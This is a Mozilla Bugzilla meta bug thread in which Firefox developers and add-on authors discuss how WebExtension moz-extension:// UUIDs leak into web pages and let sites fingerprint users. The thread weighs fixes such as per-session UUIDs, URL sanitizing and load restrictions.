Open Bug 1372288 Opened 7 years ago Updated 2 months ago

[meta] WebExtensions can be used as user fingerprint

Categories

(WebExtensions :: General, enhancement, P3)

enhancement

Tracking

(Not tracked)

People

(Reporter: iskander.sanchez, Unassigned)

References

(Depends on 3 open bugs, Blocks 1 open bug)

Details

(4 keywords, Whiteboard: [fingerprinting][fp-triaged])

Attachments

(1 file)

User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/58.0.3029.110 Chrome/58.0.3029.110 Safari/537.36

Steps to reproduce:

Last year we reported you a vulnerability regarding the possibility of
enumeration/detection of all installed extensions using a timing
side-channel attack: "(Bug) Enumeration/detection of installed add-ons
of the user - WebExtensions" to security@mozilla.org. Looks like in
order to solve this problem and maybe other related ones, you recently
modified the URL to access extension resources from
"moz-extension://<extension-id>/<path/to/resource>" to
"moz-extension://<random-UUID>/<path/to/resource>".

However, even if this change makes more difficult ,in some way, the
possibility of fingerprinting user extensions, it has created a
problem much more dangerous. The random-UUID could be used as a
fingerprint of the user if it is leaked by the extensions, such as
included as CSS or iframe in the website. We made some quick analysis
and found some extensions that leak it (e.g., Night Shift Pro or
Spines Now). A website can retrieve this UUID and use it to uniquely 
and precisely identify the user.

There are two fixes/changes that should be done to solve this problem:

1. Instead of generating a random UUID for every browser instance,
generate a random UUID for each extension in every access. In this
way, the random UUID could not be used as a user fingerprint because
it changes every time.

2. Analyze extensions for this leakages before making them public in
Firefox Add-ons and include an advice for developers indicating the
problems that can cause the leakage of any random UUID generated.
Group: firefox-core-security → toolkit-core-security
Component: Untriaged → WebExtensions: General
Product: Firefox → Toolkit
Whiteboard: [fingerprinting]
Just to check, is this because Night Shift Pro applies a stylesheet to the page in a content script by using document.createElement('link') instead of using tabs.insertCSS(). Because it does that, a page can then access it using document.styleSheets and find the unique ID of the extension?
Dan, can you make this bug public? This has been known and discussed publicly for a long as we've been doing UUID randomization, and is also the subject of a public USENIX paper[1]. I don't think there's any point in keeping it hidden.


[1]: https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-sanchez-rola.pdf
Flags: needinfo?(dveditz)
Group: toolkit-core-security
Flags: needinfo?(dveditz)
This completely defeats any anti-fingerprinting work we're doing (restricting access to resource://, the work to make web extension resources not content-accessible by default). Screenshots as described in the article requires user interaction to leak the fingerprint (and another later screenshot to check if it's the same profile), but if any other popular extension adds content to pages by default then it could lead to silent tracking and deanonymization.

The random UUID needs to be created at startup so that any tracking is limited to a session.
Status: UNCONFIRMED → NEW
Ever confirmed: true
(In reply to Daniel Veditz [:dveditz] from comment #4)
> This completely defeats any anti-fingerprinting work we're doing
> (restricting access to resource://, the work to make web extension resources
> not content-accessible by default). Screenshots as described in the article
> requires user interaction to leak the fingerprint (and another later
> screenshot to check if it's the same profile), but if any other popular
> extension adds content to pages by default then it could lead to silent
> tracking and deanonymization.
> 
> The random UUID needs to be created at startup so that any tracking is
> limited to a session.

On that basis do you think this should be considered a blocker for the Firefox 57 release? It seems like a pretty serious slip up.
Note that even if we generate the ID every session they could still be used to associate a Private Browsing context with a non-private context and allow 3rd-party trackers to reassociate cookies. Ditto across containers. Is there any sane way to generate a different resource ID per child process? Would require ugly mapping tables to live somewhere :-(
(In reply to Daniel Veditz [:dveditz] from comment #7)
> Is there any sane way to generate a different resource ID per child process?
> Would require ugly mapping tables to live somewhere :-(

Yes, but it would break extensions that expect URLs to be the same everywhere, and pass them around in messages. Ideally, I'd really like to use separate web-accessible URLs for each page load, but there's no way we could make that work without making it opt-in.
(In reply to Kris Maglione [:kmag] from comment #8)
> (In reply to Daniel Veditz [:dveditz] from comment #7)
> > Is there any sane way to generate a different resource ID per child process?
> > Would require ugly mapping tables to live somewhere :-(
> 
> Yes, but it would break extensions that expect URLs to be the same
> everywhere, and pass them around in messages. Ideally, I'd really like to
> use separate web-accessible URLs for each page load, but there's no way we
> could make that work without making it opt-in.

This may be a really, really silly idea but would it be possible to outright block access to the moz-extension protocol when not used from within the browser its self - block external requests to the protocol? This would prevent external things accessing it but I have no idea if this would even work or break things.

Again it may be a really silly idea but I figured I'd check anyway.
We can block some content loads depending on the triggering principal, but it gets dicey in a lot of circumstances, since there are only a few places where we actually keep track of the caller principal for dynamically-inserted content. So that would basically be blocked on bug 1267027.
(In reply to Kris Maglione [:kmag] from comment #8)
> (In reply to Daniel Veditz [:dveditz] from comment #7)
> > Is there any sane way to generate a different resource ID per child process?
> > Would require ugly mapping tables to live somewhere :-(
> 
> Yes, but it would break extensions that expect URLs to be the same
> everywhere, and pass them around in messages. Ideally, I'd really like to
> use separate web-accessible URLs for each page load, but there's no way we
> could make that work without making it opt-in.

If this was opt-in then we could opt in to it for Screenshots, probably with no code changes (looking at our use of getURL, we never send the result of that call to another process).
Priority: -- → P2
(In reply to Ian Bicking (:ianbicking) from comment #11)
> If this was opt-in then we could opt in to it for Screenshots, probably with
> no code changes (looking at our use of getURL, we never send the result of
> that call to another process).

The problem with making it opt-in is that it's a large amount of work, and an additional configuration to support, for something that's not likely to be used very often.

There are also issues for things like quota storage, which are tied to a particular extension URL, which we'd need to decide how to address before we could even begin working on that.
Another idea to solve the cookieStoreId issue raised by Dan is reject loads based on id's. This wouldn't really break any addons right now besides maybe a handful.

This means the extension would generate unique ids per container/pb mode for each path and prevent loads across into a different container.

This is likely less breakage than per page load.
The solution that John proposed in #security sounds at least sensible for a limited number of cases. I.e censoring moz-extension:// URLs on accessing to iframe.src getters etc. Obviously this is somewhat hard to scale, there are tons of elements like iframe, link, a, img etc. and also other ways to get access. Not even speaking about load events.
Sorry, s/John/Kris/, your IRC name...
Flags: sec-bounty?
(In reply to Limited Availabilty till Oct | Tom Schuster [:evilpie] from comment #14)
> Not even speaking about load events.

Load events aren't an issue. They don't propagate across origins for ordinary content code, and the only way web content would get access to the URL is by accessing the properties of the thing being loaded. In this case, that would be `iframe.src` or `iframe.contentWindow.location`, which are the things we would be sanitizing anyway.
(In reply to Daniel Veditz [:dveditz] from comment #7)
> Note that even if we generate the ID every session they could still be used
> to associate a Private Browsing context with a non-private context and allow
> 3rd-party trackers to reassociate cookies. Ditto across containers. Is there
> any sane way to generate a different resource ID per child process? Would
> require ugly mapping tables to live somewhere :-(

Also Tor Browser would be concerned that these UUIDs would violate first-party isolation. I'm not sure we have a separate child process for each container or first-party anyhow, unless I missed that development. Maybe we could provide a different UUID for each separate loading origin attribute hash?
If the cookie store solution in Comment #13 works, Comment #17 could likely be solved by using origin attributes to prevent loads of extension urls based upon the origin attribute it loaded from.

The only issue I see with this is that some extensions would load from a background script and this would never work in the context they tried to load it in.

This solution however wouldn't prevent the page accessing a src/href attribute despite it loading or not right?
(In reply to Ryan Jones [:sciguyryan] from comment #9)
> This may be a really, really silly idea but would it be possible to outright
> block access to the moz-extension protocol when not used from within the
> browser its self - block external requests to the protocol?

We (kinda) already do that by requiring extension to opt-in to "web-accessible" -- everything is blocked by default. Things that are web-accessible are presumably used by extensions in web content (not always -- sometimes they're used in an extension's own page). The size of the UUID basically prevents web content from probing for an extension by brute-force loading all possible UUIDs, so web content has to wait for the extension to inject some content with recognizable properties. Then it can inspect the content to see what it's src= is.

Blocking this is not impossible to do: we do something similar when a page tries to find the document location on a cross-origin iframe. Firefox used to do this kind of access check on every DOM property and it was a performance nightmare, so we've pushed such checks out to document boundaries (using Cross-Compartment Wrappers). We'd have to find all the places that might return the resource URL and then if it's moz-extension:// throw a security error unless the calling context was also moz-extension:// (or chrome, of course).

Web content won't be expecting exceptions from checking a .src property (or equivalent). Maybe returning an empty string  is better (and a console warning?).

Despite the perf downsides (and I have no idea if they're significant) this kind of approach would at least solve the "first party isolation" issue. We'd have to carefully consider all the places such URLs could leak, though, and not miss any.
(In reply to Daniel Veditz [:dveditz] from comment #19)
> Web content won't be expecting exceptions from checking a .src property (or
> equivalent). Maybe returning an empty string  is better (and a console
> warning?).

I was thinking of adding a SanitizeURL helper that would convert them to something like "restricted:".

For the sake of Screenshots, the only places we have to worry about are `iframe.src` and `iframe.contentWindow.location`. We don't expose any other kind of web-accessible resource, and no other relevant cross-origin properties are accessible.

For the more general case, there are things like <img>.src, and potentially URLs in style rules and attributes that we could also try to sanitize, but it may be hard to do comprehensively.
web_accessible_resources is available since Firefox 48 and it would be nice if ESR would get this fixed as well.

If whatever you'll end up doing here is too complicated or impossible to backport, maybe you could fix this in a first step by using non-random UUID's and then do the more complex stuff in a follow-up. That's not ideal but still better than leaving ESR users exposed for another year. Thanks
As an add-on developer, I just want to check whether this issue affects the following cases:

1. An add-on uses a content script to modify elements in the content page DOM (e.g. adding attributes).

2. An add-on uses a content script to insert new elements (that do not have 'src' attributes) into the content page DOM. The new elements are not <frames> or <iframes> and do not have 'src' attributes.

3. An add-on has a web_accessible_resource (.html file) that is loaded by a content script using an XMLHttpRequest GET request. The responseText is parsed using DOMParser() parseFromString() and the resulting document is appended to a <div> created in the content page DOM.

4. An add-on has a web_accessible_resource (.js file) that is loaded by a content script using an XMLHttpRequest GET request. The responseText is saved in string variable and later converted to a Blob and saved to a file.

5. A script in the content creates a Blob from binary data embedded in the script. The script creates a Blob URL referencing the Blob data. The Blob URL is then inserted as the 'src' URL for an image/audio/video element in the contentpage.
[Note: This case has been included in case the generated Blob URL could also be used as fingerprint].

Could any of these cases leak the UUID or anything else that could be used as a fingerprint ?
Here is my solution for this problem using crypto. (I am not a cryptographer)

<evilpie> John-Galt: so I have been thinking about the UUID issue, I think we would use encryption instead of hashing
<•John-Galt> evilpie: Why?
<evilpie> ie E(uuid || nonce) or E(uuid || origin)
<evilpie> then we could decrypt and extract the uuid everywhere
<•John-Galt> Hm. Interesting idea.
<•John-Galt> I guess we'd need to keep track of valid nonces, and teach the storage code to map those to an actual origin string correctly...
<evilpie> I think we could throw away the nonce, we just have to check if it's a valid uuid
<•John-Galt> But not something we can do quickly. We'll probably still need to do the URL access check thing for 56 or 57
<•John-Galt> Well, we'd need the tokens to expire so sites couldn't still query for the old URLs to narrow down a user based on existing fingerprint data
<•John-Galt> I guess we could just use an expiry time
<evilpie> John-Galt: oh the encryption key would change on every start
<•John-Galt> No... that would break things
<•John-Galt> evilpie: That's a start, but wouldn't we want per-origin nonces?
<•John-Galt> And per-container... Cross-container queries would still be an issue, too, or cross-origin
<evilpie> yeah either that or even nonce per getURL call
<evilpie> the downside of course is the decryption perf might become a bottleneck
<•zombie> i like that!
<evilpie> so you either want something a bit less random to allow caching
Can't screenshots (and other concerned add-ons) work around this problem by creating blob URLs for the resources they need instead of directly loading the moz-extension stuff? I understand that origins might make this tricky for subresource loads (images/styles/scripts loaded by the iframe in question) but it is in principle doable, right?

Otherwise, it seems we have these constraints (can someone check if this is an accurate and thorough list?):

- add-ons expect their urls to be portable/consistent. This makes having different urls for different containers / private / non-private browsing difficult (impossible?) to do without breaking add-on compat, because then loads done by those add-ons will fail unexpectedly if they use the "wrong" url. While opt-in mechanisms allow a possible way out of this constraint, it wouldn't fix all add-ons and it only takes 1 non-"fixed" add-on to fingerprint the user.
- add-ons expect framing content marked web-accessible to work, so we can't block triggering moz-extension: loads from the web in all cases (even if we don't allow cross-origin access to the contents of the DOM window / image / whatever), and we don't currently have an intra-DOMWindow way of segregating origin/principal information (ie we can't distinguish a website creating a DOM <img> node trying to load a moz-extension URI from one created by the add-on in the same DOM window, so we can't allow loads for one and not the other).
-- we can't use non-high-entropy identifiers within moz-extension URLs because the subpaths in the add-on are known (ie a webpage can try loading moz-extension://<nonce>/noscript.js [or similar] if they have any workable nonce to figure out if that add-on is actually noscript, which we don't want to allow)
- for websites, we want the urls to expose no fingerprintable information, neither of the user nor the add-on (so having exposed, permanent ids per add-on across users is a no-go because that would expose the add-on, and having exposed, permanent, unique ids per add-on per user is a no-go because that exposes the user).

Given these constraints, it does seem to me that censoring the sensitive parts of the URI depending on the accessing principal (which we *do* know how to distinguish, I believe, because wrappers etc.) would be the easiest, even if there might be a long tail of accesses that we'd need to fix (ie. comment 20).

Of course, given bug 1389707 I'm not sure if screenshots should continue to have in-content UI like this -- but there'll always be other add-ons that want this, I expect...
Whiteboard: [fingerprinting] → [fingerprinting][fp:m4]
Besides the obvious case of referencing extension resources in the DOM, there are also other ways to leak the UUID:
- Firefox 56+ (bug 1380186): Via response.url in fetch and responseURL in XMLHttpRequest.
- Whenever the window.postMessage API is used from an extension frame (via event.origin).

(this list is not exhaustive)


For add-ons who want to open extension resources in frames without leaking the uuid, do something like this:

var f = document.createElement("iframe");
document.body.appendChild(f);
f.contentWindow.location = chrome.extension.getURL("/some_web_accessible_page.html");
(In reply to Rob Wu [:robwu] from comment #25)
> For add-ons who want to open extension resources in frames without leaking
> the uuid, do something like this:
> 
> var f = document.createElement("iframe");
> document.body.appendChild(f);
> f.contentWindow.location =
> chrome.extension.getURL("/some_web_accessible_page.html");

That won't help. window.location is cross-origin readable.
(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #26)
> (In reply to Rob Wu [:robwu] from comment #25)
> > For add-ons who want to open extension resources in frames without leaking
> > the uuid, do something like this:
> > 
> > var f = document.createElement("iframe");
> > document.body.appendChild(f);
> > f.contentWindow.location =
> > chrome.extension.getURL("/some_web_accessible_page.html");
> 
> That won't help. window.location is cross-origin readable.

window.location permits the setter to be cross-origin, but the getter is protected by the same-origin policy.
Huh. Apparently you are correct. The `location` property is cross-origin readable, but its href property is only cross-origin writable, and its stringifier is same origin.
See Also: → 1405971
Priority: P2 → P1
(In reply to Rob Wu [:robwu] from comment #25)
> For add-ons who want to open extension resources in frames without leaking
> the uuid, do something like this:
> 
> var f = document.createElement("iframe");
> document.body.appendChild(f);
> f.contentWindow.location =
> chrome.extension.getURL("/some_web_accessible_page.html");

Nice to know that I can workaround this bug in my extension. This workaround should be documented somewhere on MDN.
Whiteboard: [fingerprinting][fp:m4] → [fingerprinting][fp:m4][fp-triaged]
Assignee: nobody → kmaglione+bmo
:Kwan highlighted another fingerprinting possibility, we now send the Origin header in XHR which contains the extensions address. We could choose to strip this header when a moz-extension: protocol this would mean the site could know the request came from an extension but not the actual extension.
The Origin header issue is bug 1257989 (the bug just talks about websockets, but the issue applies to any http request from a page including XHR/fetch)
How about returning a randomized URL from `extension.getURL` when called in a content script? It could return a fixed one in the background page for sending to other scripts. Extensions could opt out (but get a warning). This opt-out could be deprecated and removed in the future. Extensions that need more control over URI stability could use blob URIs.

(In reply to :Gijs from comment #24)
> Of course, given bug 1389707 I'm not sure if screenshots should continue to
> have in-content UI like this -- but there'll always be other add-ons that
> want this, I expect...

As peasant who does not have access I can't be certain what that is about, but I have to say that in-content UIs simply a workaround due to the lack of power of webext APIs. bootstrapped and SDK extensions had access to more powerful UI primitives such as anonymous content overlays, detached panels and so on. So they were never at the mercy of web content.

If bugs 1340930 and bug 1364404 were implemented addon devs could significantly reduce the fingerprinting surface exposed to content. Shadow DOM may also help to some extent although it's not as airtight.
Whiteboard: [fingerprinting][fp:m4][fp-triaged] → [tor][fingerprinting][fp:m4][fp-triaged]
Why do websites need access to UUID's of extensions?  This should be default-off for all extensions.  If an extension wants to give a website access to its UUID, it can create a short whitelist of allowed sites where (*) is not an option.
(In reply to Tanvi Vyas[:tanvi] from comment #33)
> Why do websites need access to UUID's of extensions?  This should be
> default-off for all extensions.  If an extension wants to give a website
> access to its UUID, it can create a short whitelist of allowed sites where
> (*) is not an option.

They don't, as such. The issue is that when extensions inject resources into content pages, the URLs of those resources is usually content-observable. And when it's an extension URL, that gives the sites a unique client ID. A whitelist wouldn't help that, since this only becomes an issue when extensions actively inject content in observable ways.

There are ways for extensions to work around this (for instance, relying on iframes with srcsoc contents, or URLs set using contentWindow.location), though.

The other issue is that once a website has access to an internal UUID, it can later poll to see which URLs load, and use that to narrow down a user's identity. My plan for that issue is to make those resources only loadable by extension triggering principals. We're almost at the point where we can do that.
(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #34)
> There are ways for extensions to work around this (for instance, relying on
> iframes with srcsoc contents, or URLs set using contentWindow.location),
> though.

srcdoc will make another (probably even worse) problem, because web pages can read the *content* of the iframe via the value of srcdoc attribute.
(In reply to Masatoshi Kimura [:emk] from comment #35)
> srcdoc will make another (probably even worse) problem, because web pages
> can read the *content* of the iframe via the value of srcdoc attribute.

No, they can only read the initial content. Once the document loads, the extension content script has access to its contents, but web content does not.
(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #36)
> (In reply to Masatoshi Kimura [:emk] from comment #35)
> > srcdoc will make another (probably even worse) problem, because web pages
> > can read the *content* of the iframe via the value of srcdoc attribute.
> 
> No, they can only read the initial content. Once the document loads, the
> extension content script has access to its contents, but web content does
> not.

You are right about web pages can only read initial content. But extension developers will have to be very careful to design the initial content to prevent it from exposing sensitive information. Even though they did, the initial content would have very high entropy for web pages to identify the extension and the version. There is no reason to use it in preference to contentWindow.location.
Assignee: kmaglione+bmo → nobody
Hey David, P1 unassigned.  Do you have a sense of where this sits in your team's queue currently?
Flags: needinfo?(ddurst)
We need to discuss that next week. I'm not sure who decides on the approach -- and there will be more to do depending on the approach. I would like to have this fixed in Q2, but...
Flags: needinfo?(ddurst)
Priority: P1 → P2
Product: Toolkit → WebExtensions
We discussed this during the last all hands and came to two conclusions:

1) It's going to be largely the responsibility of extensions to avoid leaking their UUIDs to content pages.
2) We probably want to prevent content pages from loading extension URLs directly, and only allow extension content to be injected by extensions directly. That wouldn't prevent pages from fingerprinting when extensions explicitly inject things into pages, but it would prevent them from probing for known extension URLs when they already have a guess at the identity of the user.
(In reply to Kris Maglione [:kmag] from comment #40)
> We discussed this during the last all hands and came to two conclusions:
> 
> 1) It's going to be largely the responsibility of extensions to avoid
> leaking their UUIDs to content pages.

Is there any way we can automate or detect using static analysis that an extension is going to wind up leaking the UUID?
(In reply to Tom Ritter [:tjr] from comment #41)
> (In reply to Kris Maglione [:kmag] from comment #40)
> > We discussed this during the last all hands and came to two conclusions:
> > 
> > 1) It's going to be largely the responsibility of extensions to avoid
> > leaking their UUIDs to content pages.
> 
> Is there any way we can automate or detect using static analysis that an
> extension is going to wind up leaking the UUID?

I doubt it, fetching URLs that contain the UUID isn't always wrong, but once an add-on does that somewhere we'd have to track 'tainted' content and make sure it never makes it into a DOM loaded in a browser (and then check that said DOM isn't only ever pages that belong to that add-on in the first place, and/or whether any foreign script has access to said DOM).
Prevent it, randomly generate each time used, or return something less unique. Any of these sound like good ways to address it.
(In reply to jwms from comment #43)
> Prevent it, randomly generate each time used, or return something less
> unique.

Unfortunately, it's not that simple.
(In reply to Kris Maglione [:kmag] from comment #40)
> We discussed this during the last all hands and came to two conclusions:
> 
> 1) It's going to be largely the responsibility of extensions to avoid
> leaking their UUIDs to content pages.
> 2) We probably want to prevent content pages from loading extension URLs
> directly, and only allow extension content to be injected by extensions
> directly. That wouldn't prevent pages from fingerprinting when extensions
> explicitly inject things into pages, but it would prevent them from probing
> for known extension URLs when they already have a guess at the identity of
> the user.


Then the user must be informed when an add-on could potentially be fingerprinted, based on comment #42. Pretty sure there's a permission about add-ons injecting content into webpages, does that permission include what we are talking about here. If so, might want to make it separate.

Reason: As a user relying on anti-fingerprinting protection, on a browser soon to integrate Tor through the Fusion project, I want to trust that my add-ons will not sell me out.
> Reason: As a user relying on anti-fingerprinting protection, on a browser
> soon to integrate Tor through the Fusion project, I want to trust that my
> add-ons will not sell me out.

(Failing trust, I am bound to install as few add-ons as possible even though I would benefit in comfort and workflow if I did install more add-ons.)
(In reply to Jon Irenicus from comment #45 and comment #46)
> Then the user must be informed when an add-on could potentially be
> fingerprinted, based on comment #42. Pretty sure there's a permission about
> add-ons injecting content into webpages, does that permission include what
> we are talking about here. If so, might want to make it separate.
> 
> Reason: As a user relying on anti-fingerprinting protection, on a browser
> soon to integrate Tor through the Fusion project, I want to trust that my
> add-ons will not sell me out.
> 
> (Failing trust, I am bound to install as few add-ons as possible even though
> I would benefit in comfort and workflow if I did install more add-ons.)

I know that there are some extensions which just inject their stylesheets through `<link rel="stylesheet" src="moz‑extension://{uuid}/stylesheet.css">`, which is easily detectable by websites, rather than `"content_scripts": ["css": ["stylesheet.css"]]`, which is nearly undetectable by websites.

Case in point: https://addons.mozilla.org/firefox/addon/s3download-statusbar/
(In reply to Jon Irenicus from comment #45)
> Reason: As a user relying on anti-fingerprinting protection, on a browser
> soon to integrate Tor through the Fusion project, I want to trust that my
> add-ons will not sell me out.

When Fusion gets closer, we'll be looking at the add-on concern very carefully. Chrome, for example, disables Extensions in Incognito mode unless you explicitly turn them on.  I have no idea what we'll do here except to say "We need to think about it carefully."  Maybe this bug will be fixed by then; maybe we'll fix it as part of Fusion.

I would also add that our anti-fingerprinting protection is good; but far from perfect. Feel free to use it as a best-effort experimental feature, but know there are still fingerprintable information leaks in it.
This is a legitimate privacy issue but not a security vulnerability of the sort covered by the bug bounty program.
Flags: sec-bounty? → sec-bounty-
Whiteboard: [tor][fingerprinting][fp:m4][fp-triaged] → [tor][fingerprinting][fp:m4]
No longer blocks: uplift_tor_fingerprinting
Whiteboard: [tor][fingerprinting][fp:m4] → [fingerprinting][fp-triaged]
Whiteboard: [fingerprinting][fp-triaged] → [fingerprinting][fp-triaged][webext?]

We're going to convert this over to a meta and try to chip away at this over time.

Keywords: meta
Priority: P2 → P3
Summary: WebExtensions UUID can be used as user fingerprint → [meta] WebExtensions can be used as user fingerprint
Whiteboard: [fingerprinting][fp-triaged][webext?] → [fingerprinting][fp-triaged]
Depends on: 1364404
Flags: needinfo?(m7md.alfdyly33)
Flags: needinfo?(m7md.alfdyly33)

any workaround?

Depends on: 1717671

Actually it is pretty difficult to not expose the UUID whenever you want to add any content to other websites.

Making it random makes it more difficult to probe for specific extensions and so trying to get an list of installed Add-ons. But if the random UUID is exposed this perfectly identifies this exact Firefox installation.

What do people think about this workaround until something better is found:

It should be possible to combine webRequest.onBeforeRequest and webRequest.filterResponseData to "fake" some host name, which then is used as the source for the contents you want to embed. This still allows websites to know that a specific Add-on is used, but at least does not expose some unique identifier which never changes until you uninstall and reinstall the Add-on.

I'm asking because I updated my Add-on https://addons.mozilla.org/android/addon/android-pdf-js/ to use "filterResponseData" to make it possible to view a PDF on Android while keeping the address to it in the address bar. This is absolutely cool. Feels like on Desktop where Firefox has this built in. But now I'm unsure if I should keep it this way or go back to my "old way" which was redirecting from the PDF address to the moz-extension:// URL. Way less cool but the redirect makes it actually impossible for the website to know that the redirect happened, as now the PDF viewer is a different origin and so no longer accessible from the original host.

(In reply to Manuel Reimer from comment #52)

Actually it is pretty difficult to not expose the UUID whenever you want to add any content to other websites.

It's possible to insert content without exposing the UUID by using closed shadow DOM, see https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_shadow_DOM

It should be possible to combine webRequest.onBeforeRequest and webRequest.filterResponseData to "fake" some host name, which then is used as the source for the contents you want to embed. This still allows websites to know that a specific Add-on is used, but at least does not expose some unique identifier which never changes until you uninstall and reinstall the Add-on.

I'm asking because I updated my Add-on https://addons.mozilla.org/android/addon/android-pdf-js/ to use "filterResponseData" to make it possible to view a PDF on Android while keeping the address to it in the address bar. This is absolutely cool. Feels like on Desktop where Firefox has this built in. But now I'm unsure if I should keep it this way or go back to my "old way" which was redirecting from the PDF address to the moz-extension:// URL. Way less cool but the redirect makes it actually impossible for the website to know that the redirect happened, as now the PDF viewer is a different origin and so no longer accessible from the original host.

You'll probably be interested in bug 1712096.
For your specific use case, bug 1457500 would be more appropriate.

(In reply to Manuel Reimer from comment #53)

I did some tries and while the embedded PDF.js in the desktop Firefox somehow is "a different origin" this does not work with "filterResponseData". Means that if I open a PDF in a new window, then I can access the content with my version but not on Desktop Firefox.

Can I somehow get the same with an WebExtension? Can I somehow mark my changed website as "protected" just as Firefox does it with PDF.js on the desktop version?

Generalizing the logic of PDF.js to an extension API is not something that's actively being worked on, but it would be covered by bug 1457500.

PS. Please stop commenting on this bug about your extension; it's unrelated to the topic of the bug and results in bugmail to many people.

(In reply to Rob Wu [:robwu] from comment #54)

It's possible to insert content without exposing the UUID by using closed shadow DOM, see https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_shadow_DOM

I have heard that the closed shadow DOM is not a security boundary. That is, even if the closed shadow DOM "leaks" the shadow DOM content, it would not be considered as a security vulnerability. So I had to resort to cross-origin iframe. Is that changed?

(In reply to Masatoshi Kimura [:emk] from comment #55)

(In reply to Rob Wu [:robwu] from comment #54)

It's possible to insert content without exposing the UUID by using closed shadow DOM, see https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_shadow_DOM

I have heard that the closed shadow DOM is not a security boundary. That is, even if the closed shadow DOM "leaks" the shadow DOM content, it would not be considered as a security vulnerability. So I had to resort to cross-origin iframe. Is that changed?

(Closed) shadow DOM does NOT provide full isolation, and it's very easy to inadvertently leak references to its content. Extensions have access to an execution environment isolated from the web page (content scripts), which enables them to load a subresource (e.g. moz-extension:-frame) in a shadow tree, without inadvertently leaking the extension URL. If you have a counter-example that shows a leak of the UUID under this construction, please let me know and I'll stop mentioning this option.

Depends on: 1257989

This issue becomes much more relevant when these UUIDs can be discovered by a Spectre-attacker enumerating a content process' address space. Making the UUIDs unique-per-session would help a lot, but that's still not ideal.

Blocks: 1707955

(In reply to Tom Ritter [:tjr] from comment #57)

This issue becomes much more relevant when these UUIDs can be discovered by a Spectre-attacker enumerating a content process' address space. Making the UUIDs unique-per-session would help a lot, but that's still not ideal.

I wonder how much we can realistically mitigate fingerprinting with spectre... We have enough identifying information in the content process as it is, and when extensions are involved, I'd expect a lot of them to send identifying information of their own.

In any case, I'm not sure we can realistically change this at this point. It was hard enough to get developers to use APIs to get their base URL rather than hard coding it as they had been used to under Chrome. But I know for a fact that there are extensions that generate HTML for their UI and cache it across sessions (I have at least seen TreeStyleTab doing it), and if their base URL changes, I'm sure that some of that HTML will break.

Severity: normal → S3
Whiteboard: [fingerprinting][fp-triaged] → [fingerprinting][fp-triaged][sp3]
Whiteboard: [fingerprinting][fp-triaged][sp3] → [fingerprinting][fp-triaged]
You need to log in before you can comment on or make changes to this bug.